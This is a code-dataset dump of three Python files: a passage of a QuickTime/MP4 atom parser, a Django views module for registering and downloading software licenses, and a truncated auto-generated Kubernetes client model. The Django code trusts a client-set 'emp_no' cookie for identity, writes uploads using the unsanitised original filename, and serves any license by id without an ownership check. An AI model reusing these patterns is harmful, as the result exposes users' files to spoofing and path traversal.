yield String(self, "manufacturer", 4)
yield UInt32(self, "res_flags")
yield UInt32(self, "res_flags_mask")
if self.root.is_mpeg4:
yield CString(self, "name", charset="UTF-8")
else:
yield PascalString8(self, "name")
class LanguageCode(FieldSet):
static_size = 16
MAC_LANG = {
0: 'English',
1: 'French',
2: 'German',
3: 'Italian',
4: 'Dutch',
5: 'Swedish',
6: 'Spanish',
7: 'Danish',
8: 'Portuguese',
9: 'Norwegian',
10: 'Hebrew',
11: 'Japanese',
12: 'Arabic',
13: 'Finnish',
14: 'Greek',
15: 'Icelandic',
16: 'Maltese',
17: 'Turkish',
18: 'Croatian',
19: 'Traditional Chinese',
20: 'Urdu',
21: 'Hindi',
22: 'Thai',
23: 'Korean',
24: 'Lithuanian',
25: 'Polish',
26: 'Hungarian',
27: 'Estonian',
28: 'Latvian',
28: 'Lettish',
29: 'Lappish',
29: 'Saamisk',
30: 'Faeroese',
31: 'Farsi',
32: 'Russian',
33: 'Simplified Chinese',
34: 'Flemish',
35: 'Irish',
36: 'Albanian',
37: 'Romanian',
38: 'Czech',
39: 'Slovak',
40: 'Slovenian',
41: 'Yiddish',
42: 'Serbian',
43: 'Macedonian',
44: 'Bulgarian',
45: 'Ukrainian',
46: 'Byelorussian',
47: 'Uzbek',
48: 'Kazakh',
49: 'Azerbaijani',
50: 'AzerbaijanAr',
51: 'Armenian',
52: 'Georgian',
53: 'Moldavian',
54: 'Kirghiz',
55: 'Tajiki',
56: 'Turkmen',
57: 'Mongolian',
58: 'MongolianCyr',
59: 'Pashto',
60: 'Kurdish',
61: 'Kashmiri',
62: 'Sindhi',
63: 'Tibetan',
64: 'Nepali',
65: 'Sanskrit',
66: 'Marathi',
67: 'Bengali',
68: 'Assamese',
69: 'Gujarati',
70: 'Punjabi',
71: 'Oriya',
72: 'Malayalam',
73: 'Kannada',
74: 'Tamil',
75: 'Telugu',
76: 'Sinhalese',
77: 'Burmese',
78: 'Khmer',
79: 'Lao',
80: 'Vietnamese',
81: 'Indonesian',
82: 'Tagalog',
83: 'MalayRoman',
84: 'MalayArabic',
85: 'Amharic',
86: 'Tigrinya',
88: 'Somali',
89: 'Swahili',
90: 'Ruanda',
91: 'Rundi',
92: 'Chewa',
93: 'Malagasy',
94: 'Esperanto',
128: 'Welsh',
129: 'Basque',
130: 'Catalan',
131: 'Latin',
132: 'Quechua',
133: 'Guarani',
134: 'Aymara',
135: 'Tatar',
136: 'Uighur',
137: 'Dzongkha',
138: 'JavaneseRom',
}
def fieldHandler(self, field):
if field.value == 0:
return ' '
return chr(field.value + 0x60)
def createFields(self):
value = self.stream.readBits(self.absolute_address, 16, self.endian)
if value < 1024:
yield Enum(UInt16(self, "lang"), self.MAC_LANG)
else:
yield NullBits(self, "padding[]", 1)
yield textHandler(Bits(self, "lang[0]", 5), self.fieldHandler)
yield textHandler(Bits(self, "lang[1]", 5), self.fieldHandler)
yield textHandler(Bits(self, "lang[2]", 5), self.fieldHandler)
def createValue(self):
if 'lang' in self:
return self['lang'].display
return self['lang[0]'].display + self['lang[1]'].display + self['lang[2]'].display
class MediaHeader(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version (0 or 1)")
yield NullBits(self, "flags", 24)
if self['version'].value == 0:
# 32-bit version
yield TimestampMac32(self, "creation_date", "Creation time of this media")
yield TimestampMac32(self, "lastmod_date", "Last modification time of this media")
yield UInt32(self, "time_scale", "Number of time-units per second")
yield UInt32(self, "duration", "Length of media, in time-units")
elif self['version'].value == 1:
# 64-bit version
yield TimestampMac64(self, "creation_date", "Creation time of this media")
yield TimestampMac64(self, "lastmod_date", "Last modification time of this media")
yield UInt32(self, "time_scale", "Number of time-units per second")
yield UInt64(self, "duration", "Length of media, in time-units")
yield LanguageCode(self, "language")
yield Int16(self, "quality")
class VideoMediaHeader(FieldSet):
GRAPHICSMODE = {
0: ('Copy', "Copy the source image over the destination"),
0x20: ('Blend', "Blend of source and destination; blending factor is controlled by op color"),
0x24: ('Transparent', "Replace destination pixel with source pixel if the source pixel is not the op color"),
0x40: ('Dither copy', "Dither image if necessary, else copy"),
0x100: ('Straight alpha', "Blend of source and destination; blending factor is controlled by alpha channel"),
0x101: ('Premul white alpha', "Remove white from each pixel and blend"),
0x102: ('Premul black alpha', "Remove black from each pixel and blend"),
0x103: ('Composition', "Track drawn offscreen and dither copied onto screen"),
0x104: ('Straight alpha blend', "Blend of source and destination; blending factor is controlled by combining alpha channel and op color")
}
def graphicsDisplay(self, field):
if field.value in self.GRAPHICSMODE:
return self.GRAPHICSMODE[field.value][0]
return hex(field.value)
def graphicsDescription(self, field):
if field.value in self.GRAPHICSMODE:
return self.GRAPHICSMODE[field.value][1]
return ""
def createFields(self):
yield UInt8(self, "version", "Version")
yield Bits(self, "flags", 24, "Flags (=1)")
graphics = UInt16(self, "graphicsmode")
graphics.createDisplay = lambda:self.graphicsDisplay(graphics)
graphics.createDescription = lambda:self.graphicsDescription(graphics)
yield graphics
yield UInt16(self, "op_red", "Red value for graphics mode")
yield UInt16(self, "op_green", "Green value for graphics mode")
yield UInt16(self, "op_blue", "Blue value for graphics mode")
class SoundMediaHeader(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 24)
yield QTFloat16(self, "balance")
yield UInt16(self, "reserved[]")
class HintMediaHeader(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 24)
yield UInt16(self, "max_pdu_size")
yield UInt16(self, "avg_pdu_size")
yield UInt32(self, "max_bit_rate")
yield UInt32(self, "avg_bit_rate")
yield UInt32(self, "reserved[]")
class DataEntryUrl(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 23)
yield Bit(self, "is_same_file", "Is the reference to this file?")
if not self['is_same_file'].value:
yield CString(self, "location")
class DataEntryUrn(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 23)
yield Bit(self, "is_same_file", "Is the reference to this file?")
if not self['is_same_file'].value:
yield CString(self, "name")
yield CString(self, "location")
class DataReference(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count")
for i in xrange(self['count'].value):
yield Atom(self, "atom[]")
class EditList(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version (0 or 1)")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count")
version = self['version'].value
if version == 0:
UInt, Int = UInt32, Int32
elif version == 1:
UInt, Int = UInt64, Int64
else:
raise ParserError("elst version %d not supported"%version)
for i in xrange(self['count'].value):
yield UInt(self, "duration[]", "Duration of this edit segment")
yield Int(self, "time[]", "Starting time of this edit segment within the media (-1 = empty edit)")
yield QTFloat32(self, "play_speed[]", "Playback rate (0 = dwell edit, 1 = normal playback)")
class Load(FieldSet):
def createFields(self):
yield UInt32(self, "start")
yield UInt32(self, "length")
yield UInt32(self, "flags") # PreloadAlways = 1 or TrackEnabledPreload = 2
yield UInt32(self, "hints") # KeepInBuffer = 0x00000004; HighQuality = 0x00000100; SingleFieldVideo = 0x00100000
class MovieHeader(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version (0 or 1)")
yield NullBits(self, "flags", 24)
if self['version'].value == 0:
# 32-bit version
yield TimestampMac32(self, "creation_date", "Creation time of this presentation")
yield TimestampMac32(self, "lastmod_date", "Last modification time of this presentation")
yield UInt32(self, "time_scale", "Number of time-units per second")
yield UInt32(self, "duration", "Length of presentation, in time-units")
elif self['version'].value == 1:
# 64-bit version
yield TimestampMac64(self, "creation_date", "Creation time of this presentation")
yield TimestampMac64(self, "lastmod_date", "Last modification time of this presentation")
yield UInt32(self, "time_scale", "Number of time-units per second")
yield UInt64(self, "duration", "Length of presentation, in time-units")
yield QTFloat32(self, "play_speed", "Preferred playback speed (1.0 = normal)")
yield QTFloat16(self, "volume", "Preferred playback volume (1.0 = full)")
yield NullBytes(self, "reserved[]", 10)
yield QTFloat32(self, "geom_a", "Width scale")
yield QTFloat32(self, "geom_b", "Width rotate")
yield QTFloat2_30(self, "geom_u", "Width angle")
yield QTFloat32(self, "geom_c", "Height rotate")
yield QTFloat32(self, "geom_d", "Height scale")
yield QTFloat2_30(self, "geom_v", "Height angle")
yield QTFloat32(self, "geom_x", "Position X")
yield QTFloat32(self, "geom_y", "Position Y")
yield QTFloat2_30(self, "geom_w", "Divider scale")
yield UInt32(self, "preview_start")
yield UInt32(self, "preview_length")
yield UInt32(self, "still_poster")
yield UInt32(self, "sel_start")
yield UInt32(self, "sel_length")
yield UInt32(self, "current_time")
yield UInt32(self, "next_track_ID", "Value to use as the track ID for the next track added")
class FileType(FieldSet):
def createFields(self):
yield String(self, "brand", 4, "Major brand")
yield UInt32(self, "version", "Version")
while not self.eof:
yield String(self, "compat_brand[]", 4, "Compatible brand")
def findHandler(self):
''' find the handler corresponding to this fieldset '''
while self:
if self.name in ('media', 'tags'):
break
self = self.parent
else:
return None
for atom in self:
if atom['tag'].value == 'hdlr':
return atom['hdlr']
return None
class METATAG(FieldSet):
def createFields(self):
yield UInt8(self, "unk[]", "0x80 or 0x00")
yield PascalString16(self, "tag_name", charset='UTF-8')
yield UInt16(self, "unk[]", "0x0001")
yield UInt16(self, "unk[]", "0x0000")
yield PascalString16(self, "tag_value", charset='UTF-8')
class META(FieldSet):
def createFields(self):
# This tag has too many variant forms.
if '/tags/' in self.path:
yield UInt32(self, "count")
for i in xrange(self['count'].value):
yield METATAG(self, "tag[]")
elif self.stream.readBits(self.absolute_address, 32, self.endian) == 0:
yield UInt8(self, "version")
yield Bits(self, "flags", 24)
yield AtomList(self, "tags")
else:
yield AtomList(self, "tags")
class Item(FieldSet):
def createFields(self):
yield UInt32(self, "size")
yield UInt32(self, "index")
yield Atom(self, "value")
class KeyList(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count")
for i in xrange(self['count'].value):
yield Atom(self, "key[]")
class ItemList(FieldSet):
def createFields(self):
handler = findHandler(self)
if handler is None:
raise ParserError("ilst couldn't find metadata handler")
if handler['subtype'].value == 'mdir':
while not self.eof:
yield Atom(self, "atom[]")
elif handler['subtype'].value == 'mdta':
while not self.eof:
yield Item(self, "item[]")
class NeroChapters(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "unknown")
yield UInt8(self, "count", description="Number of chapters")
for i in xrange(self['count'].value):
yield UInt64(self, "chapter_start[]")
yield PascalString8(self, "chapter_name[]", charset='UTF-8')
class SampleDecodeTimeTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Total entries in sample time table")
for i in xrange(self['count'].value):
yield UInt32(self, "sample_count[]", "Number of consecutive samples with this delta")
yield UInt32(self, "sample_delta[]", "Decode time delta since last sample, in time-units")
class SampleCompositionTimeTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Total entries in sample time table")
for i in xrange(self['count'].value):
yield UInt32(self, "sample_count[]", "Number of consecutive samples with this offset")
yield UInt32(self, "sample_offset[]", "Difference between decode time and composition time of this sample, in time-units")
class ChunkOffsetTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Total entries in offset table")
for i in xrange(self['count'].value):
yield UInt32(self, "chunk_offset[]")
class ChunkOffsetTable64(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Total entries in offset table")
for i in xrange(self['count'].value):
yield UInt64(self, "chunk_offset[]")
class SampleEntry(FieldSet):
def createFields(self):
yield UInt32(self, "size")
yield RawBytes(self, "format", 4, "Data Format (codec)")
yield NullBytes(self, "reserved[]", 6, "Reserved")
yield UInt16(self, "data_reference_index")
handler = findHandler(self)
if not handler:
raise ParserError("stsd couldn't find track handler")
if handler['subtype'].value == 'soun':
# Audio sample entry
yield NullBytes(self, "reserved[]", 8)
yield UInt16(self, "channels", "Number of audio channels")
yield UInt16(self, "samplesize", "Sample size in bits")
yield UInt16(self, "unknown")
yield NullBytes(self, "reserved[]", 2)
yield QTFloat32(self, "samplerate", "Sample rate in Hz")
elif handler['subtype'].value == 'vide':
# Video sample entry
yield UInt16(self, "version")
yield UInt16(self, "revision_level")
yield RawBytes(self, "vendor_id", 4)
yield UInt32(self, "temporal_quality")
yield UInt32(self, "spatial_quality")
yield UInt16(self, "width", "Width (pixels)")
yield UInt16(self, "height", "Height (pixels)")
yield QTFloat32(self, "horizontal_resolution", "Horizontal resolution in DPI")
yield QTFloat32(self, "vertical resolution", "Vertical resolution in DPI")
yield UInt32(self, "data_size")
yield UInt16(self, "frame_count")
yield UInt8(self, "compressor_name_length")
yield String(self, "compressor_name", 31, strip='\0')
yield UInt16(self, "depth", "Bit depth of image")
yield Int16(self, "unknown")
elif handler['subtype'].value == 'hint':
# Hint sample entry
pass
size = self['size'].value - self.current_size//8
if size > 0:
yield RawBytes(self, "extra_data", size)
class SampleDescription(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Total entries in table")
for i in xrange(self['count'].value):
yield SampleEntry(self, "sample_entry[]")
class SyncSampleTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Number of sync samples")
for i in xrange(self['count'].value):
yield UInt32(self, "sample_number[]")
class SampleSizeTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "uniform_size", description="Uniform size of each sample (0 if non-uniform)")
yield UInt32(self, "count", description="Number of samples")
if self['uniform_size'].value == 0:
for i in xrange(self['count'].value):
yield UInt32(self, "sample_size[]")
class CompactSampleSizeTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield NullBits(self, "reserved[]", 24)
yield UInt8(self, "field_size", "Size of each entry in this table, in bits")
yield UInt32(self, "count", description="Number of samples")
bitsize = self['field_size'].value
for i in xrange(self['count'].value):
yield Bits(self, "sample_size[]", bitsize)
if self.current_size % 8 != 0:
yield NullBits(self, "padding[]", 8 - (self.current_size % 8))
class SampleToChunkTable(FieldSet):
def createFields(self):
yield UInt8(self, "version")
yield NullBits(self, "flags", 24)
yield UInt32(self, "count", description="Number of samples")
for i in xrange(self['count'].value):
yield UInt32(self, "first_chunk[]")
yield UInt32(self, "samples_per_chunk[]")
yield UInt32(self, "sample_description_index[]")
class Atom(FieldSet):
tag_info = {
"ftyp": (FileType, "file_type", "File type and compatibility"),
# pdin: progressive download information
# pnot: movie preview (old QT spec)
"moov": (AtomList, "movie", "Container for all metadata"),
"mvhd": (MovieHeader, "movie_hdr", "Movie header, overall declarations"),
# clip: movie clipping (old QT spec)
# crgn: movie clipping region (old QT spec)
"trak": (AtomList, "track", "Container for an individual track or stream"),
"tkhd": (TrackHeader, "track_hdr", "Track header, overall information about the track"),
# matt: track matte (old QT spec)
# kmat: compressed matte (old QT spec)
"tref": (AtomList, "tref", "Track reference container"),
"hint": (TrackReferenceType, "hint", "Original media track(s) for this hint track"),
"cdsc": (TrackReferenceType, "cdsc", "Reference to track described by this track"),
"edts": (AtomList, "edts", "Edit list container"),
"elst": (EditList, "elst", "Edit list"),
"load": (Load, "load", "Track loading settings (old QT spec)"),
# imap: Track input map (old QT spec)
"mdia": (AtomList, "media", "Container for the media information in a track"),
"mdhd": (MediaHeader, "media_hdr", "Media header, overall information about the media"),
"hdlr": (Handler, "hdlr", "Handler, declares the media or metadata (handler) type"),
"minf": (AtomList, "minf", "Media information container"),
"vmhd": (VideoMediaHeader, "vmhd", "Video media header, overall information (video track only)"),
"smhd": (SoundMediaHeader, "smhd", "Sound media header, overall information (sound track only)"),
"hmhd": (HintMediaHeader, "hmhd", "Hint media header, overall information (hint track only)"),
# nmhd: Null media header, overall information (some tracks only) (unparsed)
"dinf": (AtomList, "dinf", "Data information, container"),
"dref": (DataReference, "dref", "Data reference, declares source(s) of media data in track"),
"url ": (DataEntryUrl, "url", "URL data reference"),
"urn ": (DataEntryUrn, "urn", "URN data reference"),
"stbl": (AtomList, "stbl", "Sample table, container for the time/space map"),
"stsd": (SampleDescription, "stsd", "Sample descriptions (codec types, initialization etc.)"),
"stts": (SampleDecodeTimeTable, "stts", "decoding time-to-sample delta table"),
"ctts": (SampleCompositionTimeTable, "ctts", "composition time-to-sample offset table"),
"stsc": (SampleToChunkTable, "stsc", "sample-to-chunk, partial data-offset information"),
"stsz": (SampleSizeTable, "stsz", "Sample size table (framing)"),
"stz2": (CompactSampleSizeTable, "stz2", "Compact sample size table (framing)"),
"stco": (ChunkOffsetTable, "stco", "Chunk offset, partial data-offset information"),
"co64": (ChunkOffsetTable64, "co64", "64-bit chunk offset"),
"stss": (SyncSampleTable, "stss", "Sync sample table (random access points)"),
# stsh: shadow sync sample table
# padb: sample padding bits
# stdp: sample degradation priority
# sdtp: independent and disposable samples
# sbgp: sample-to-group
# sgpd: sample group description
# subs: sub-sample information
# ctab color table (old QT spec)
# mvex: movie extends
# mehd: movie extends header
# trex: track extends defaults
# ipmc: IPMP control
# moof: movie fragment
# mfhd: movie fragment header
# traf: track fragment
# tfhd: track fragment header
# trun: track fragment run
# sdtp: independent and disposable samples
# sbgp: sample-to-group
# subs: sub-sample information
# mfra: movie fragment random access
# tfra: track fragment random access
# mfro: movie fragment random access offset
# mdat: media data container
# free: free space (unparsed)
# skip: free space (unparsed)
"udta": (AtomList, "udta", "User data"),
"meta": (META, "meta", "File metadata"),
"keys": (KeyList, "keys", "Metadata keys"),
## hdlr
## dinf
## dref: data reference, declares source(s) of metadata items
## ipmc: IPMP control
# iloc: item location
# ipro: item protection
# sinf: protection scheme information
# frma: original format
# imif: IPMP information
# schm: scheme type
# schi: scheme information
# iinf: item information
# xml : XML container
# bxml: binary XML container
# pitm: primary item reference
## other tags
"ilst": (ItemList, "ilst", "Item list"),
"trkn": (AtomList, "trkn", "Metadata: Track number"),
"disk": (AtomList, "disk", "Metadata: Disk number"),
"tmpo": (AtomList, "tempo", "Metadata: Tempo"),
"cpil": (AtomList, "cpil", "Metadata: Compilation"),
"gnre": (AtomList, "gnre", "Metadata: Genre"),
"\xa9cpy": (AtomList, "copyright", "Metadata: Copyright statement"),
"\xa9day": (AtomList, "date", "Metadata: Date of content creation"),
"\xa9dir": (AtomList, "director", "Metadata: Movie director"),
"\xa9ed1": (AtomList, "edit1", "Metadata: Edit date and description (1)"),
"\xa9ed2": (AtomList, "edit2", "Metadata: Edit date and description (2)"),
"\xa9ed3": (AtomList, "edit3", "Metadata: Edit date and description (3)"),
"\xa9ed4": (AtomList, "edit4", "Metadata: Edit date and description (4)"),
"\xa9ed5": (AtomList, "edit5", "Metadata: Edit date and description (5)"),
"\xa9ed6": (AtomList, "edit6", "Metadata: Edit date and description (6)"),
"\xa9ed7": (AtomList, "edit7", "Metadata: Edit date and description (7)"),
"\xa9ed8": (AtomList, "edit8", "Metadata: Edit date and description (8)"),
"\xa9ed9": (AtomList, "edit9", "Metadata: Edit date and description (9)"),
"\xa9fmt": (AtomList, "format", "Metadata: Movie format (CGI, digitized, etc.)"),
"\xa9inf": (AtomList, "info", "Metadata: Information about the movie"),
"\xa9prd": (AtomList, "producer", "Metadata: Movie producer"),
"\xa9prf": (AtomList, "performers", "Metadata: Performer names"),
"\xa9req": (AtomList, "requirements", "Metadata: Special hardware and software requirements"),
"\xa9src": (AtomList, "source", "Metadata: Credits for those who provided movie source content"),
"\xa9nam": (AtomList, "name", "Metadata: Name of song or video"),
"\xa9des": (AtomList, "description", "Metadata: File description"),
"\xa9cmt": (AtomList, "comment", "Metadata: General comment"),
"\xa9alb": (AtomList, "album", "Metadata: Album name"),
"\xa9gen": (AtomList, "genre", "Metadata: Custom genre"),
"\xa9ART": (AtomList, "artist", "Metadata: Artist name"),
"\xa9too": (AtomList, "encoder", "Metadata: Encoder"),
"\xa9wrt": (AtomList, "writer", "Metadata: Writer"),
"covr": (AtomList, "cover", "Metadata: Cover art"),
"----": (AtomList, "misc", "Metadata: Miscellaneous"),
"tags": (AtomList, "tags", "File tags"),
"tseg": (AtomList, "tseg", "tseg"),
"chpl": (NeroChapters, "chpl", "Nero chapter data"),
}
tag_handler = [ item[0] for item in tag_info ]
tag_desc = [ item[1] for item in tag_info ]
def createFields(self):
yield UInt32(self, "size")
yield RawBytes(self, "tag", 4)
size = self["size"].value
if size == 1:
# 64-bit size
yield UInt64(self, "size64")
size = self["size64"].value - 16
elif size == 0:
# Unbounded atom
if self._size is None:
size = (self.parent.size - self.parent.current_size) / 8 - 8
else:
size = (self.size - self.current_size) / 8
else:
size = size - 8
if self['tag'].value == 'uuid':
yield GUID(self, "usertag")
tag = self["usertag"].value
size -= 16
else:
tag = self["tag"].value
if size > 0:
if tag in self.tag_info:
handler, name, desc = self.tag_info[tag]
yield handler(self, name, desc, size=size*8)
else:
yield RawBytes(self, "data", size)
def createDescription(self):
if self["tag"].value == "uuid":
return "Atom: uuid: "+self["usertag"].value
return "Atom: %s" % self["tag"].value
class MovFile(Parser):
PARSER_TAGS = {
"id": "mov",
"category": "video",
"file_ext": ("mov", "qt", "mp4", "m4v", "m4a", "m4p", "m4b"),
"mime": (u"video/quicktime", u'video/mp4'),
"min_size": 8*8,
"magic": (("moov", 4*8),),
"description": "Apple QuickTime movie"
}
BRANDS = {
# File type brand => MIME type
'mp41': u'video/mp4',
'mp42': u'video/mp4',
'avc1': u'video/mp4',
'isom': u'video/mp4',
'iso2': u'video/mp4',
}
endian = BIG_ENDIAN
def __init__(self, *args, **kw):
Parser.__init__(self, *args, **kw)
is_mpeg4 = property(lambda self:self.mime_type==u'video/mp4')
def validate(self):
# TODO: Write better code, erk!
size = self.stream.readBits(0, 32, self.endian)
if size < 8:
return "Invalid first atom size"
tag = self.stream.readBytes(4*8, 4)
return tag in ("ftyp", "moov", "free")
def createFields(self):
while not self.eof:
yield Atom(self, "atom[]")
def createMimeType(self):
first = self[0]
try:
# Read brands in the file type
if first['tag'].value != "ftyp":
return None
file_type = first["file_type"]
brand = file_type["brand"].value
if brand in self.BRANDS:
return self.BRANDS[brand]
for field in file_type.array("compat_brand"):
brand = field.value
if brand in self.BRANDS:
return self.BRANDS[brand]
except MissingField:
pass
return u'video/quicktime'
| gpl-2.0 |
idjung96/mng_files | mng_lic/views.py | 1 | 6818 | # -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, render_to_response
from mng_lic import models as lic_models
from largefile import models as l_models
from django.http import HttpResponseBadRequest
from django.http import StreamingHttpResponse
from django.http import HttpResponseRedirect
import math
import time
import os
from mng_files import settings
import datetime
import mimetypes
import urllib.parse
# Create your views here.
def reg_license(request):
if 'emp_no' not in request.COOKIES:
return redirect('login')
seeds = str(math.ceil(time.time() * 100))
if request.method == 'POST':
form = lic_models.LicenseForm(request.POST, request.FILES)
if form.is_valid():
reg_emp_no = str(request.COOKIES['emp_no'])
program_name = form.cleaned_data['program_name']
program_ver = form.cleaned_data['program_ver']
license_type = form.cleaned_data['license_type']
copy = form.cleaned_data['copy']
user = form.cleaned_data['user']
org_expire_date = (form.cleaned_data['expire_date']).split('-')
expire_date = datetime.date(int(org_expire_date[0]), int(org_expire_date[1]), int(org_expire_date[2]))
owner_emp_no = form.cleaned_data['owner']
maintenance = form.cleaned_data['maintenance']
eula = form.cleaned_data['eula']
r_size, file_loc = save_upload_file(request.FILES['license_file'], owner_emp_no, seeds)
new_lic = lic_models.License.objects.create(owner_employee_number=owner_emp_no,
program_name=program_name,
program_ver=program_ver,
license_type=license_type,
copy=copy,
license_file=file_loc,
expire_date=expire_date,
maintenance=maintenance,
reg_employee_number=reg_emp_no,
eula=eula)
new_lic.save()
return render(request, 'msg.html', {'page_header': 'License registered',
'msg_header': '-',
'msg_body': '-'})
else:
form = lic_models.LicenseForm()
return render(request, 'mng_lic/register.html', {'form': form})
def save_upload_file(f, emp_no, seeds):
r_size = (-1)
dfname = seeds + '_' + emp_no + '_' + f.name
file_loc = os.path.join(settings.LICENSE_DIR, dfname)
try:
with open(file_loc, 'wb+') as destination:
for chunk in f.chunks():
r_size += len(chunk)
destination.write(chunk)
except Exception as e:
print(e)
return r_size, file_loc
def my_license(request):
if 'emp_no' not in request.COOKIES:
return redirect('login')
result = {}
if request.method == 'GET':
emp_no = str(request.COOKIES['emp_no'])
licenses = lic_models.License.objects.filter(owner_employee_number=emp_no).order_by('-expire_date').values()
result['result'] = [entry for entry in licenses]
return render(request, 'mng_lic/my_lic.html', result)
def view_eula(request, id_value):
if 'emp_no' not in request.COOKIES:
return redirect('login')
if request.method == 'GET':
emp_no = str(request.COOKIES['emp_no'])
objects = lic_models.License.objects.filter(id_val=id_value)
org_result = [entry for entry in objects]
return render(request, 'mng_lic/view_eula.html', {'result': org_result[0]})
def download_lic(request, id_value):
if 'emp_no' not in request.COOKIES:
return redirect('login')
if request.method == 'GET':
obj = lic_models.License.objects.get(pk=id_value)
file = obj.__dict__
# fp = open(file['file_loc'], 'rb')
# response = HttpResponse(fp.read())
# fp.close()
response = StreamingHttpResponse(open(file['license_file'], 'rb'))
response['Content-Description'] = 'File Transfer'
response['Content-Transfer-Encoding'] = 'binary'
response['Expires'] = '0'
response['Cache-Control'] = 'must-revalidate'
response['Pragma'] = 'public'
h_type, encoding = mimetypes.guess_type(file['license_file'])
if h_type is None:
h_type = 'application/octet-stream'
response['Content-Type'] = h_type
file_extension = file['license_file'].split('.')
filename = file['owner_employee_number'] + '_' + file['program_name'] + '_' + nvl(file['program_ver'], 'nov') + '_' + nvl(file['company'], 'noc') + '.' + file_extension[1]
response['Content-Length'] = str(os.stat(file['license_file']).st_size)
if encoding is not None:
response['Content-Encoding'] = encoding
else:
response['Content-Encoding'] = 'utf-8'
filename_header = ''
if response['Content-Encoding'] == 'utf-8':
filename_header += "filename*=UTF-8\'\'%s" % urllib.parse.quote(filename)
# filename_header = 'filename="%s"' % file['filename']
# filename_header += "; filename*=UTF-8\'\'%s" % file['filename'].encode('utf-8')
elif u'WebKit' in request.META['HTTP_USER_AGENT']:
# Safari 3.0 and Chrome 2.0 accepts UTF-8 encoded string directly.
# filename_header = 'filename=%s' % file['filename'].encode('utf-8')
filename_header = 'filename=%s' % filename
elif u'MSIE' in request.META['HTTP_USER_AGENT']:
# IE does not support internationalized filename at all.
# It can only recognize internationalized URL, so we do the trick via routing rules.
filename_header = ''
else:
# For others like Firefox, we follow RFC2231 (encoding extension in HTTP headers).
# filename_header = 'filename*=UTF-8\'\'%s' % urllib.quote(file['filename'].encode('utf-8'))
filename_header = 'filename*=UTF-8\'\'%s' % urllib.parse.quote(filename)
response['Content-Disposition'] = 'attachment; ' + filename_header
return response
return render(request, 'msg.html', {'page_header': 'You file status is abnormal',
'msg_header': 'You should make a request again',
'msg_body': 'You should make a request again'})
def nvl(t, ret_value):
if t is None:
return ret_value
return t
| gpl-3.0 |
djkonro/client-python | kubernetes/client/models/v1beta1_network_policy_spec.py | 2 | 5714 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1NetworkPolicySpec(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, ingress=None, pod_selector=None):
"""
V1beta1NetworkPolicySpec - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'ingress': 'list[V1beta1NetworkPolicyIngressRule]',
'pod_selector': 'V1LabelSelector'
}
self.attribute_map = {
'ingress': 'ingress',
'pod_selector': 'podSelector'
}
self._ingress = ingress
self._pod_selector = pod_selector
@property
def ingress(self):
"""
Gets the ingress of this V1beta1NetworkPolicySpec.
List of ingress rules to be applied to the selected pods. Traffic is allowed to a pod if there are no NetworkPolicies selecting the pod OR if the traffic source is the pod's local node, OR if the traffic matches at least one ingress rule across all of the NetworkPolicy objects whose podSelector matches the pod. If this field is empty then this NetworkPolicy does not allow any traffic (and serves solely to ensure that the pods it selects are isolated by default).
:return: The ingress of this V1beta1NetworkPolicySpec.
:rtype: list[V1beta1NetworkPolicyIngressRule]
"""
return self._ingress
@ingress.setter
def ingress(self, ingress):
"""
Sets the ingress of this V1beta1NetworkPolicySpec.
List of ingress rules to be applied to the selected pods. Traffic is allowed to a pod if there are no NetworkPolicies selecting the pod OR if the traffic source is the pod's local node, OR if the traffic matches at least one ingress rule across all of the NetworkPolicy objects whose podSelector matches the pod. If this field is empty then this NetworkPolicy does not allow any traffic (and serves solely to ensure that the pods it selects are isolated by default).
:param ingress: The ingress of this V1beta1NetworkPolicySpec.
:type: list[V1beta1NetworkPolicyIngressRule]
"""
self._ingress = ingress
@property
def pod_selector(self):
"""
Gets the pod_selector of this V1beta1NetworkPolicySpec.
Selects the pods to which this NetworkPolicy object applies. The array of ingress rules is applied to any pods selected by this field. Multiple network policies can select the same set of pods. In this case, the ingress rules for each are combined additively. This field is NOT optional and follows standard label selector semantics. An empty podSelector matches all pods in this namespace.
:return: The pod_selector of this V1beta1NetworkPolicySpec.
:rtype: V1LabelSelector
"""
return self._pod_selector
@pod_selector.setter
def pod_selector(self, pod_selector):
"""
Sets the pod_selector of this V1beta1NetworkPolicySpec.
